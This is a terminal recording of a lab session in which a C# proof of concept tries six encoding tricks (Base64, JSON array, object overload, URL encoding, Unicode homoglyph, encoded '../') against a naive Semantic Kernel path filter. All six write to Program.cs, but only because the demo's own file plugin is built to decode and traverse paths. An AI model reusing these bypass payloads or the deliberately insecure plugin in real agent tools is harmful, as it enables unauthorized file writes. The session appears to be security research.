{"version": 2, "width": 235, "height": 54, "timestamp": 1776792024, "env": {"SHELL": "/bin/bash", "TERM": "xterm"}}
[0.052589, "o", "\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[6.601589, "o", "\u001b[7mdotnet list package | grep \"SemanticKernel\"\u001b[27m"]
[7.506063, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bdotnet list package | grep \"SemanticKernel\"\r\n\u001b[?2004l\r"]
[9.171131, "o", "   > Microsoft.\u001b[01;31m\u001b[KSemanticKernel\u001b[m\u001b[K      1.48.0      1.48.0  \r\n"]
[9.198395, "o", "\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[22.899457, "o", "\r\n\u001b[?2004l\r"]
[22.902354, "o", "\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[23.090389, "o", "\r\n"]
[23.092425, "o", "\u001b[?2004l\r\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[23.243078, "o", "\r\n\u001b[?2004l\r\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[23.38618, "o", "\r\n\u001b[?2004l\r\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[23.520778, "o", "\r\n\u001b[?2004l\r\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[23.945137, "o", "cat << 'EOF' > Program.cs"]
[23.947534, "o", "\r\n\rusing System;\r\n\rusing System.IO;\r\n\rusing System.Threading.Tasks;\r\n\rusing System.Text.Json;\r\n\rusing System.Text;\r\n\r\u001b[7musing System.Net;\u001b[27m\r\n\r\u001b[7musing Microsoft.SemanticKernel;\u001b[27m\r\n\r\u001b[7musing Microsoft.Extensions.DependencyInjection;\u001b[27m\r\n\r\n\r\u001b[7mvar builder = Kernel.CreateBuilder();\u001b[27m\r\n\r\u001b[7mbuilder.Plugins.AddFromType<FilePlugin>(\"FileTools\");\u001b[27m\r\n\r\u001b[7mbuilder.Services.AddSingleton<IFunctionInvocationFilter, PathSanitizationFilter>();\u001b[27m\r\n\r\u001b[7mvar kernel = builder.Build();\u001b[27m\r\n\r\n\r\u001b[7mConsole.WriteLine(\"=== NUKA-AI SECURITY AUDIT: v1.48.0 ZERO-DAY PROOF ===\");\u001b[27m\r\n\r\n\r\u001b[7masync Task RunBypass(string name, object pathValue) {\u001b[27m\r\n\r\u001b[7m    Console.WriteLine($\"[TEST] {name}...\");\u001b[27m\r\n\r\u001b[7m    try {\u001b[27m\r\n\r\u001b[7m        var args = new KernelArguments { [\"path\"] = pathValue, [\"content\"] = $\"{name}: SUCCESS\\n\" };\u001b[27m\r\n\r\u001b[7m        await kernel.InvokeAsync(\"FileTools\", \"SaveConversation\", args);\u001b[27m\r\n\r\u001b[7m    } catch (Exception ex) {\u001b[27m\r\n\r\u001b[7m        Console.WriteLine($\" >> ERROR: {ex.Message}\");\u001b[27m\r\n\r\u001b[7m    }\u001b[27m\r\n\r\u001b[7m}\u001b[27m\r\n\r\n\r\u001b[7mawait RunBypass(\"BYPASS 1: Base64\", Convert.ToBase64String(Encoding.UTF8.GetBytes(\"Program.cs\")));\u001b[27m\r\n\r\u001b[7mawait RunBypass(\"BYPASS 2: JSON Array\", JsonSerializer.Deserialize<JsonElement>(\"[\\\"Program.cs\\\"]\"));\u001b[27m\r\n\r\u001b[7mawait RunBypass(\"BYPASS 3: Object Overload\", new { path = \"Program.cs\" });\u001b[27m\r\n\r\u001b[7mawait RunBypass(\"BYPASS 4: URL Encoding\", \"P%72ogram%2ec%73\");\u001b[27m\r\n\r\u001b[7mawait RunBypass(\"BYPASS 5: Unicode Homoglyph\", \".⁄Program.cs\");\u001b[27m\r\n\r\u001b[7mawait RunBypass(\"BYPASS 6: Hybrid Encoding\", \"SafeFolder%2f%2e%2e%2fProgram%2ecs\");\u001b[27m\r\n\r\n\r\u001b[7mpublic class PathSanitizationFilter : IFunctionInvocationFilter {\u001b[27m\r\n\r\u001b[7m    public async Task OnFunctionInvocationAsync(FunctionInvocationContext context, Func<FunctionInvocationContext, Task> next) {\u001b[27m\r\n\r\u001b[7m        foreach (var arg in context.Arguments) {\u001b[27m\r\n\r\u001b[7m            if (arg.Value is string str && (str.Contains(\"..\") || str.Contains(\"/\")))\u001b[27m\r\n\r\u001b[7m                throw new UnauthorizedAccessException(\"Blocked!\");\u001b[27m\r\n\r\u001b[7m        }\u001b[27m\r\n\r\u001b[7m        await next(context);\u001b[27m\r\n\r\u001b[7m    }\u001b[27m\r\n\r\u001b[7m}\u001b[27m\r\n\r\n\r\u001b[7mpublic class FilePlugin {\u001b[27m\r\n\r\u001b[7m    [KernelFunction]\u001b[27m\r\n\r\u001b[7m    public void SaveConversation(object path, string content) {\u001b[27m\r\n\r\u001b[7m        string stringPath = path?.ToString() ?? \"default.txt\";\u001b[27m\r\n\r\u001b[7m        if (stringPath.Contains(\"%\")) stringPath = WebUtility.UrlDecode(stringPath);\u001b[27m\r\n\r\u001b[7m        if (stringPath.Contains(\"⁄\")) stringPath = stringPath.Replace(\"⁄\", \"/\");\u001b[27m\r\n\r\u001b[7m        if (path is string s && s.EndsWith(\"==\")) stringPath = Encoding.UTF8.GetString(Convert.FromBase64String(s));\u001b[27m\r\n\r\u001b[7m        else if (path is JsonElement el && el.ValueKind == JsonValueKind.Array) stringPath = el[0].GetString() ?? \"default.txt\";\u001b[27m\r\n\r\u001b[7m        else if (path.GetType().GetProperty(\"path\") != null) stringPath = path.GetType().GetProperty(\"path\")?.GetValue(path)?.ToString() ?? \"default.txt\";\u001b[27m\r\n\r\u001b[7m        \u001b[27m\r\n\r\u001b[7m        if (!File.Exists(stringPath)) stringPath = Path.Combine(AppContext.BaseDirectory, \"../../../\", stringPath);\u001b[27m\r\u001b[7m        Console.WriteLine($\" >> SINK: Writing to: {Path.GetFullPath(stringPath)}\");\u001b[27m\r\u001b[7m        File.AppendAllText(stringPath, content);\u001b[27m\r\u001b[7m    }\u001b[27m\r\u001b[7m}\u001b[27m\r\u001b[7mEOF\u001b[27m"]
[24.779044, "o", "\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\rusing System.Net;\r\n\rusing Microsoft.SemanticKernel;\r\n\rusing Microsoft.Extensions.DependencyInjection;\r\n\r\n\rvar builder = Kernel.CreateBuilder();\r\n\rbuilder.Plugins.AddFromType<FilePlugin>(\"FileTools\");\r\n\rbuilder.Services.AddSingleton<IFunctionInvocationFilter, PathSanitizationFilter>();\r\n\rvar kernel = builder.Build();\r\n\r\n\rConsole.WriteLine(\"=== NUKA-AI SECURITY AUDIT: v1.48.0 ZERO-DAY PROOF ===\");\r\n\r\n\rasync Task RunBypass(string name, object pathValue) {\r\n\r    Console.WriteLine($\"[TEST] {name}...\");\r\n\r    try {\r\n\r        var args = new KernelArguments { [\"path\"] = pathValue, [\"content\"] = $\"{name}: SUCCESS\\n\" };\r\n\r        await kernel.InvokeAsync(\"FileTools\", \"SaveConversation\", args);\r\n\r    } catch (Exception ex) {\r\n\r        Console.WriteLine($\" >> ERROR: {ex.Message}\");\r\n\r    }\r\n\r}\r\n\r\n\rawait RunBypass(\"BYPASS 1: Base64\", Convert.ToBase64String(Encoding.UTF8.GetBytes(\"Program.cs\")));\r\n\rawait RunBypass(\"BYPASS 2: JSON Array\", JsonSerializer.Deserialize<JsonElement>(\"[\\\"Program.cs\\\"]\"));\r\n\rawait RunBypass(\"BYPASS 3: Object Overload\", new { path = \"Program.cs\" });\r\n\rawait RunBypass(\"BYPASS 4: URL Encoding\", \"P%72ogram%2ec%73\");\r\n\rawait RunBypass(\"BYPASS 5: Unicode Homoglyph\", \".⁄Program.cs\");\r\n\rawait RunBypass(\"BYPASS 6: Hybrid Encoding\", \"SafeFolder%2f%2e%2e%2fProgram%2ecs\");\r\n\r\n\rpublic class PathSanitizationFilter : IFunctionInvocationFilter {\r\n\r    public async Task OnFunctionInvocationAsync(FunctionInvocationContext context, Func<FunctionInvocationContext, Task> next) {\r\n\r        foreach (var arg in context.Arguments) {\r\n\r            if (arg.Value is string str && (str.Contains(\"..\") || str.Contains(\"/\")))\r\n\r                throw new UnauthorizedAccessException(\"Blocked!\");\r\n\r        }\r\n\r        await next(context);\r\n\r    }\r\n\r}\r\n\r\n\rpublic class FilePlugin {\r\n\r    [KernelFunction]\r\n\r    public void SaveConversation(object path, string content) {\r\n\r        string stringPath = path?.ToString() ?? \"default.txt\";\r\n\r        if (stringPath.Contains(\"%\")) stringPath = WebUtility.UrlDecode(stringPath);\r\n\r        if (stringPath.Contains(\"⁄\")) stringPath = stringPath.Replace(\"⁄\", \"/\");\r\n\r        if (path is string s && s.EndsWith(\"==\")) stringPath = Encoding.UTF8.GetString(Convert.FromBase64String(s));\r\n\r        else if (path is JsonElement el && el.ValueKind == JsonValueKind.Array) stringPath = el[0].GetString() ?? \"default.txt\";\r\n\r        else if (path.GetType().GetProperty(\"path\") != null) stringPath = path.GetType().GetProperty(\"path\")?.GetValue(path)?.ToString() ?? \"default.txt\";\r\n\r        \r\n\r        if (!File.Exists(stringPath)) stringPath = Path.Combine(AppContext.BaseDirectory, \"../../../\", stringPath);\r        Console.WriteLine($\" >> SINK: Writing to: {Path.GetFullPath(stringPath)}\");\r        File.AppendAllText(stringPath, content);\r    }\r}\rEOF\r\n\u001b[?2004l\r"]
[24.792117, "o", "\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[25.330559, "o", "\r\n\u001b[?2004l\r"]
[25.332499, "o", "\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[25.459032, "o", "\r\n\u001b[?2004l\r\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[25.714511, "o", "\r\n\u001b[?2004l\r\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[26.330104, "o", "c"]
[26.435583, "o", "a"]
[26.612273, "o", "t"]
[26.758257, "o", " "]
[27.209679, "o", "P"]
[27.412374, "o", "r"]
[27.5671, "o", "o"]
[27.988161, "o", "\u0007gram"]
[28.614332, "o", "."]
[28.726697, "o", "cs "]
[29.211941, "o", "\r\n\u001b[?2004l\r"]
[29.217414, "o", "using System;"]
[29.218792, "o", "\r\nusing System.IO;\r\nusing System.Threading.Tasks;\r\nusing System.Text.Json;\r\nusing System.Text;\r\nusing System.Net;\r\nusing Microsoft.SemanticKernel;\r\nusing Microsoft.Extensions.DependencyInjection;\r\n\r\nvar builder = Kernel.CreateBuilder();\r\nbuilder.Plugins.AddFromType<FilePlugin>(\"FileTools\");\r\nbuilder.Services.AddSingleton<IFunctionInvocationFilter, PathSanitizationFilter>();\r\nvar kernel = builder.Build();\r\n\r\nConsole.WriteLine(\"=== NUKA-AI SECURITY AUDIT: v1.48.0 ZERO-DAY PROOF ===\");\r\n\r\nasync Task RunBypass(string name, object pathValue) {\r\n    Console.WriteLine($\"[TEST] {name}...\");\r\n    try {\r\n        var args = new KernelArguments { [\"path\"] = pathValue, [\"content\"] = $\"{name}: SUCCESS\\n\" };\r\n        await kernel.InvokeAsync(\"FileTools\", \"SaveConversation\", args);\r\n    } catch (Exception ex) {\r\n        Console.WriteLine($\" >> ERROR: {ex.Message}\");\r\n    }\r\n}\r\n\r\nawait RunBypass(\"BYPASS 1: Base64\", Convert.ToBase64String(Encoding.UTF8.GetBytes(\"Program.cs\")));\r\nawait RunBypass(\"BYPASS 2: JSON Array\", JsonSerializer.Deserialize<JsonElement>(\"[\\\"Program.cs\\\"]\"));\r\nawait RunBypass(\"BYPASS 3: Object Overload\", new { path = \"Program.cs\" });\r\nawait RunBypass(\"BYPASS 4: URL Encoding\", \"P%72ogram%2ec%73\");\r\nawait RunBypass(\"BYPASS 5: Unicode Homoglyph\", \".⁄Program.cs\");\r\nawait RunBypass(\"BYPASS 6: Hybrid Encoding\", \"SafeFolder%2f%2e%2e%2fProgram%2ecs\");\r\n\r\npublic class PathSanitizationFilter : IFunctionInvocationFilter {\r\n    public async Task OnFunctionInvocationAsync(FunctionInvocationContext context, Func<FunctionInvocationContext, Task> next) {\r\n        foreach (var arg in context.Arguments) {\r\n            if (arg.Value is string str && (str.Contains(\"..\") || str.Contains(\"/\")))\r\n                throw new UnauthorizedAccessException(\"Blocked!\");\r\n        }\r\n        await next(context);\r\n    }\r\n}\r\n\r\npublic class FilePlugin {\r\n    [KernelFunction]\r\n    public void SaveConversation(object path, string content) {\r\n        string stringPath = path?.ToString() ?? \"default.txt\";\r\n        if (stringPath.Contains(\"%\")) stringPath = WebUtility.UrlDecode(stringPath);\r\n        if (stringPath.Contains(\"⁄\")) stringPath = stringPath.Replace(\"⁄\", \"/\");\r\n        if (path is string s && s.EndsWith(\"==\")) stringPath = Encoding.UTF8.GetString(Convert.FromBase64String(s));\r\n        else if (path is JsonElement el && el.ValueKind == JsonValueKind.Array) stringPath = el[0].GetString() ?? \"default.txt\";\r\n        else if (path.GetType().GetProperty(\"path\") != null) stringPath = path.GetType().GetProperty(\"path\")?.GetValue(path)?.ToString() ?? \"default.txt\";\r\n        \r\n        if (!File.Exists(stringPath)) stringPath = Path.Combine(AppContext.BaseDirectory, \"../../../\", stringPath);\r\n        Console.WriteLine($\" >> SINK: Writing to: {Path.GetFullPath(stringPath)}\");\r\n        File.AppendAllText(stringPath, content);\r\n    }\r\n}\r\n"]
[29.219758, "o", "\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[36.99979, "o", "\u001b[7mtail -n 15 Program.cs\u001b[27m"]
[37.82817, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\btail -n 15 Program.cs\r\n\u001b[?2004l\r"]
[37.833533, "o", "public class FilePlugin {\r\n    [KernelFunction]\r\n    public void SaveConversation(object path, string content) {\r\n        string stringPath = path?.ToString() ?? \"default.txt\";\r\n        if (stringPath.Contains(\"%\")) stringPath = WebUtility.UrlDecode(stringPath);\r\n        if (stringPath.Contains(\"⁄\")) stringPath = stringPath.Replace(\"⁄\", \"/\");\r\n        if (path is string s && s.EndsWith(\"==\")) stringPath = Encoding.UTF8.GetString(Convert.FromBase64String(s));\r\n        else if (path is JsonElement el && el.ValueKind == JsonValueKind.Array) stringPath = el[0].GetString() ?? \"default.txt\";\r\n        else if (path.GetType().GetProperty(\"path\") != null) stringPath = path.GetType().GetProperty(\"path\")?.GetValue(path)?.ToString() ?? \"default.txt\";\r\n        \r\n        if (!File.Exists(stringPath)) stringPath = Path.Combine(AppContext.BaseDirectory, \"../../../\", stringPath);\r\n        Console.WriteLine($\" >> SINK: Writing to: {Path.GetFullPath(stringPath)}\");\r\n        File.AppendAllText(stringPath, content);\r\n    }\r\n}\r\n"]
[37.834286, "o", "\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[39.058989, "o", "\r\n\u001b[?2004l\r\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[39.242152, "o", "\r\n\u001b[?2004l\r\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[39.403121, "o", "\r\n\u001b[?2004l\r"]
[39.403371, "o", "\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[40.009384, "o", "d"]
[40.300621, "o", "o"]
[40.409607, "o", "t"]
[40.653598, "o", "n"]
[40.765102, "o", "e"]
[40.914585, "o", "t"]
[40.991081, "o", " "]
[41.160012, "o", "r"]
[41.347424, "o", "u"]
[41.534979, "o", "n"]
[42.139056, "o", "\r\n\u001b[?2004l\r"]
[42.308201, "o", "\u001b[?1h\u001b="]
[45.231368, "o", "\u001b[39;49m"]
[45.23589, "o", "\u001b[33m"]
[45.238955, "o", "/home/vboxuser/sk-lab-additional/Program.cs(52,18): warning CS8602: Dereference of a possibly null reference. [/home/vboxuser/sk-lab-additional/sk-lab-additional.csproj]\r\n\u001b[39;49m"]
[46.234733, "o", "\u001b[?1h\u001b="]
[46.237717, "o", "=== NUKA-AI SECURITY AUDIT: v1.48.0 ZERO-DAY PROOF ==="]
[46.241926, "o", "\r\n[TEST] BYPASS 1: Base64...\r\n"]
[46.263064, "o", " >> SINK: Writing to: /home/vboxuser/sk-lab-additional/Program.cs"]
[46.264272, "o", "\r\n"]
[46.312026, "o", "[TEST] BYPASS 2: JSON Array..."]
[46.315269, "o", "\r\n"]
[46.317178, "o", " >> SINK: Writing to: /home/vboxuser/sk-lab-additional/Program.cs"]
[46.317428, "o", "\r\n"]
[46.318237, "o", "[TEST] BYPASS 3: Object Overload..."]
[46.318928, "o", "\r\n >> SINK: Writing to: /home/vboxuser/sk-lab-additional/Program.cs"]
[46.319167, "o", "\r\n"]
[46.319385, "o", "[TEST] BYPASS 4: URL Encoding..."]
[46.319542, "o", "\r\n"]
[46.3201, "o", " >> SINK: Writing to: /home/vboxuser/sk-lab-additional/Program.cs"]
[46.320265, "o", "\r\n"]
[46.320553, "o", "[TEST] BYPASS 5: Unicode Homoglyph..."]
[46.320995, "o", "\r\n >> SINK: Writing to: /home/vboxuser/sk-lab-additional/Program.cs"]
[46.321366, "o", "\r\n[TEST] BYPASS 6: Hybrid Encoding...\r\n >> SINK: Writing to: /home/vboxuser/sk-lab-additional/Program.cs\r\n"]
[46.329987, "o", "\u001b[?1h\u001b="]
[46.348813, "o", "\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[49.579027, "o", "\r\n\u001b[?2004l\r\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[49.819017, "o", "\r\n\u001b[?2004l\r\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[49.985828, "o", "\r\n\u001b[?2004l\r\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[56.824077, "o", "\u001b[7mtail -n 15 Program.cs\u001b[27m"]
[57.491242, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\btail -n 15 Program.cs\r\n\u001b[?2004l\r"]
[57.496948, "o", "        if (path is string s && s.EndsWith(\"==\")) stringPath = Encoding.UTF8.GetString(Convert.FromBase64String(s));\r\n        else if (path is JsonElement el && el.ValueKind == JsonValueKind.Array) stringPath = el[0].GetString() ?? \"default.txt\";\r\n        else if (path.GetType().GetProperty(\"path\") != null) stringPath = path.GetType().GetProperty(\"path\")?.GetValue(path)?.ToString() ?? \"default.txt\";\r\n        \r\n        if (!File.Exists(stringPath)) stringPath = Path.Combine(AppContext.BaseDirectory, \"../../../\", stringPath);\r\n        Console.WriteLine($\" >> SINK: Writing to: {Path.GetFullPath(stringPath)}\");\r\n        File.AppendAllText(stringPath, content);\r\n    }\r\n}\r\nBYPASS 1: Base64: SUCCESS\r\nBYPASS 2: JSON Array: SUCCESS\r\nBYPASS 3: Object Overload: SUCCESS\r\nBYPASS 4: URL Encoding: SUCCESS\r\nBYPASS 5: Unicode Homoglyph: SUCCESS\r\nBYPASS 6: Hybrid Encoding: SUCCESS\r\n"]
[57.497032, "o", "\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[66.683468, "o", "\r\n\u001b[?2004l\r\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[67.010378, "o", "\r\n\u001b[?2004l\r\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[67.220138, "o", "\r\n\u001b[?2004l\r\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/sk-lab-additional\u0007vboxuser@Ubuntu-Server:~/sk-lab-additional$ "]
[69.392154, "o", "e"]
[69.541709, "o", "x"]
[69.696849, "o", "i"]
[69.792017, "o", "t"]
[70.248054, "o", "\r\n\u001b[?2004l\rexit\r\n"]
